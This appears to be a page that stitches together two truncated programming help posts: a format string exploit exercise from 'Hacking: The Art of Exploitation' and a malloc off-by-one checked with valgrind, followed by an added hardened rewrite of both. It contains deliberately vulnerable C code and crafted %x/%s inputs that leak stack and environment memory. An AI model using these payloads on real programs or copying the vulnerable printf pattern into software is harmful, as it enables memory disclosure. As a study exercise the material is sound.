I am reading the book "Hacking: The Art of Exploitation".
This is a simplified version of the code I am using for the format string exploit.
```c
/* fmt_vuln.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char text[1024];

    if (argc < 2) {
        printf("Usage: %s <text to print>\n", argv[0]);
        exit(0);
    }
    strcpy(text, argv[1]);   /* no length check: argv[1] is copied as-is */
    printf("The wrong way to print user-controlled input:\n");
    printf(text);            /* user input used as the format string (the bug under study) */
    printf("\n");
    return 0;
}
```
I ran this command:
```
./fmt_vuln AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
```
I got:
```
The wrong way to print user-controlled input:
AAAA59055000.58e347a0.58b68620.ffffffff.00000000.fba56ac8.58a9fc58.41414141
```
So I see that the 8th format parameter is read from the beginning of the format string.
Then, when I run the command:
```
./getenv PATH ./fmt_vuln
```
I get the address:
```
0x7ffe2a673d84
```
So I tried running (to print the PATH variable):
```
./fmt_vuln $(printf "\x84\x3d\x67\x2a\xfe\x7f")%08x.%08x.%08x.%08x.%08x.%08x.%08x.%s
```
I got:
```
The wrong …
```

I have the following code:
```c
/* main.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
    int i;
    char *msg = "This is a simple and small message";
    int len = strlen(msg);
    char *new_msg = (char *) malloc(len);   /* len bytes: no room for a terminating '\0' */

    for (i = 0; i < len; i++)
        new_msg[i] = 'A';
    printf("%s\n", new_msg);   /* %s reads until a '\0', i.e. past the end of the block */
    free(new_msg);
    return 0;
}
```
I compiled it and then ran it under valgrind with this command:
```
valgrind --leak-check=full --show-reachable=yes ./main
```
I got this output:
```
==8286== Memcheck, a memory error detector
==8286== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. …
```
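Added example, not from the book or from either post above: the hardened counterparts of the two defects the posts exercise. `print_user_text` keeps the format string constant and passes the input only as a `%s` argument, so conversions in the input are printed literally instead of walking the stack; `make_filled_copy` allocates `len + 1` bytes and writes the terminator that `main.c` never does, so `printf("%s")` and `strlen` stay inside the allocation. The function names and the sample input are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hardened counterpart of fmt_vuln.c's printf(text): the format string is a
 * constant and the user text is only ever a %s argument, so "%x" or "%s"
 * inside it are printed as characters, not interpreted as conversions.
 * Writes into out (capacity n) and returns the length of the full output.
 * GCC and Clang flag the original printf(text) form with -Wformat-security. */
int print_user_text(const char *text, char *out, size_t n)
{
    return snprintf(out, n,
                    "The safe way to print user-controlled input:\n%s\n", text);
}

/* Hardened counterpart of main.c's malloc(len) loop: one extra byte is
 * allocated and set to '\0', so readers that stop at the terminator never
 * run past the block (the access Memcheck reports for main.c).
 * Returns a heap string the caller must free(), or NULL on allocation failure. */
char *make_filled_copy(const char *msg, char fill)
{
    size_t len = strlen(msg);
    char *new_msg = malloc(len + 1);      /* +1 for the terminator */
    if (new_msg == NULL)
        return NULL;
    memset(new_msg, (unsigned char)fill, len);
    new_msg[len] = '\0';                  /* the byte main.c never writes */
    return new_msg;
}

/* Check helper: 1 if s has exactly n bytes and every one of them is 'fill'. */
int is_filled(const char *s, char fill, size_t n)
{
    size_t i;
    if (strlen(s) != n)
        return 0;
    for (i = 0; i < n; i++)
        if (s[i] != fill)
            return 0;
    return 1;
}

int main(void)
{
    char out[256];
    /* Constructed sample input that mirrors the page's command line. */
    print_user_text("AAAA%08x.%08x.%08x.%08x", out, sizeof out);
    fputs(out, stdout);                   /* the %08x's appear literally */

    char *copy = make_filled_copy("This is a simple and small message", 'A');
    if (copy != NULL) {
        printf("%s\n", copy);             /* 34 'A's, then a clean stop */
        free(copy);
    }
    return 0;
}
```

Running `main.c` fixed this way under the same `valgrind --leak-check=full` command gives a clean Memcheck summary, because both the read in `printf("%s")` and the final `free` now operate on a correctly sized, terminated block.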